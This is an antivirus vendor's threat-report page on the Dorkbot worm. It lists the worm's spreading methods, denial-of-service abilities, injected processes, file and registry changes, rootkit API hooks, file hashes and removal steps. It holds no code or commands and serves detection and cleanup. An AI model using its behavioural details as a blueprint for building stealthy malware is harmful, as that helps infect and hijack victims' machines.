Worm.Win32.Dorkbot_407a7b5eae – Adaware

Dynamic Analysis

Payload

Behaviour	Description
WormAutorun	A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
IRCBot	A bot can communicate with command and control servers via IRC channel.
MSNWorm	A worm can spread its copies through the MSN Messanger.
DNSBlocker	A program can block designated DNS servers for making it difficult for users to locate specific domains or web sites on the Internet.
UDPFlooder	This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host.
SYNFlooder	This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
Trojan-Proxy	This program can launch a proxy server (SOCKS4) on a designated TCP port.
USBInfector	A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.

Process activity

The Worm creates the following process(es):

2.exe:1612
%original file name%.exe:404
%original file name%.exe:772

The Worm injects its code into the following process(es):

wuauclt.exe:1792
2.exe:1240
spoolsv.exe:1436
vmacthlp.exe:924
csrss.exe:688
winlogon.exe:712
services.exe:756
Explorer.EXE:888
svchost.exe:936
svchost.exe:1020
svchost.exe:1104
svchost.exe:1164
svchost.exe:1244
wmiprvse.exe:1352
jqs.exe:1592

File activity

The process 2.exe:1240 makes changes in the file system.

The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[2].txt (3941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Poemas[1].htm (50506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\imp[1].html?s=300x250&M=5&r=0 (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_13[1].gif (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CSS.Sitio[1].css (10973 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ii_13[1].gif (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[3].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\facebook[1].png (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i_84[1].gif (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\560[1].png (330 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\st[1] (4627 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_82[1].gif (354 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vineta[1].gif (87 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2454[1].htm (1596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_02[1].gif (3521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\twitter[1].png (608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\videos_ico[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i-2i[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\568[1].png (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i.f06[1].gif (277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[1].html (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[4].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Principal[1].js (5401 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\imp[1].html?s=300x250&M=5&r=0 (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\imp[2].html?s=300x250&M=5&r=0 (711 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_86[1].gif (355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\st[1] (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA4TMZWD.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[1].js (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Latinoamericanas[1].htm (36234 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[2].txt (338 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_58[1].gif (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i_28[1].gif (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_26[1].gif (573 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\567[1].png (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\e_17[1].gif (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\c83b510be812cec3ea3446015eb76621[1].gif (4984 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[1].txt (5605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Funciones[1].js (3449 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\fa1b6b9794e5b240bbad703d9f4c9a12[1].png (4434 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\swfobject[1].js (6753 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA416Z8D.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\f[1].gif (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\-4524f[1].gif (110 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\fondo_icos[1].gif (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i-21[1].gif (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\lyrics_ico[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\st[1] (2871 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[1].txt (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[3].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\c5f8760e7af5ff75c20de7295e421a6f[1].png (1529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i_08[1].gif (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[2].html (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i-play[1].gif (393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\syij4[1].gif (351 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\esmusicon[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAOP2XPQ.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\imp[1].html?s=300x250&M=5&r=0 (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\st[2] (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[3].html (382 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (26028 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[2].txt (5030 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\esmusicon[1].htm (50961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CSS.Panel[1].css (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\principal[1].swf (16315 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[2].js (1677 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[1].txt (3755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ii_14[1].gif (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\mi.2papa[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i.b07[1].gif (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i_15[1].gif (156 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA416Z8D.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\imp[1].html?s=300x250&M=5&r=0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[2].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[1].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\imp[1].html?s=300x250&M=5&r=0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[3].html (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2454[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAOP2XPQ.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\esmusicon[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA4TMZWD.gif (0 bytes)

Registry activity

The process 2.exe:1240 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "2.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "16708456"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 98 7C 23 29 F8 DC 07 A4 10 E6 54 0A 97 77 40"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 2.exe:1612 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 AC 10 22 2A 81 8C F2 12 F6 6B BA 5B 79 0F EA"

The process %original file name%.exe:404 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 67 77 ED 66 3B 5C D6 08 5F F1 57 45 42 B2 FA"

The process %original file name%.exe:772 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 83 1C E6 F9 A8 ED B7 4E A7 47 02 40 32 B0 F3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

Dropped PE files

MD5	File path
d94da84045124ec63a2790ba9a89f807	c:\Documents and Settings\"%CurrentUserName%"\Application Data\1.tmp
635e78b303136a15a6a8ea03b857e4c1	c:\Documents and Settings\"%CurrentUserName%"\Application Data\2.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Worm installs the following user-mode hooks in WININET.dll:

HttpSendRequestW
InternetWriteFile
HttpSendRequestA

The Worm installs the following user-mode hooks in DNSAPI.dll:

DnsQuery_A
DnsQuery_W

The Worm installs the following user-mode hooks in WS2_32.dll:

send
GetAddrInfoW

The Worm installs the following user-mode hooks in kernel32.dll:

MoveFileA
CopyFileW
CopyFileA
MoveFileW
CreateFileW
CreateFileA

The Worm installs the following user-mode hooks in ntdll.dll:

LdrLoadDll
NtResumeThread
NtQueryDirectoryFile
NtEnumerateValueKey

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.A worm can spread its copies through the MSN Messanger.

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):
2.exe:1612
%original file name%.exe:404
%original file name%.exe:772
Delete the original Worm file.
Delete or disinfect the following files created/modified by the Worm:
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[2].txt (3941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Poemas[1].htm (50506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\imp[1].html?s=300x250&M=5&r=0 (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_13[1].gif (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CSS.Sitio[1].css (10973 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ii_13[1].gif (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[3].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\facebook[1].png (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i_84[1].gif (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\560[1].png (330 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\st[1] (4627 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_82[1].gif (354 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vineta[1].gif (87 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2454[1].htm (1596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_02[1].gif (3521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\twitter[1].png (608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\videos_ico[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i-2i[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\568[1].png (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i.f06[1].gif (277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[1].html (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[4].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Principal[1].js (5401 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\imp[1].html?s=300x250&M=5&r=0 (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\imp[2].html?s=300x250&M=5&r=0 (711 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_86[1].gif (355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\st[1] (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA4TMZWD.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[1].js (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Latinoamericanas[1].htm (36234 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[2].txt (338 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_58[1].gif (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i_28[1].gif (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_26[1].gif (573 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\567[1].png (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\e_17[1].gif (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\c83b510be812cec3ea3446015eb76621[1].gif (4984 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[1].txt (5605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Funciones[1].js (3449 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\fa1b6b9794e5b240bbad703d9f4c9a12[1].png (4434 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\swfobject[1].js (6753 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA416Z8D.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\f[1].gif (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\-4524f[1].gif (110 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\fondo_icos[1].gif (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i-21[1].gif (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\lyrics_ico[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\st[1] (2871 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[1].txt (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[3].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\c5f8760e7af5ff75c20de7295e421a6f[1].png (1529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i_08[1].gif (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[2].html (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i-play[1].gif (393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\syij4[1].gif (351 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\esmusicon[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAOP2XPQ.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\imp[1].html?s=300x250&M=5&r=0 (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\st[2] (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[3].html (382 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (26028 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[2].txt (5030 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\esmusicon[1].htm (50961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CSS.Panel[1].css (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\principal[1].swf (16315 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[2].js (1677 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[1].txt (3755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ii_14[1].gif (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\mi.2papa[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i.b07[1].gif (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i_15[1].gif (156 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	39953	40960	4.02467	5a1e4cb8210fdbb00982f6d5eca8c55f
.data	45056	8448	4096	0	620f0b67a91f7f74151bc5be745b7110
.rsrc	57344	2066	0	0	d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 5
6d94103d83489a6635cdbcd9f054cfdb
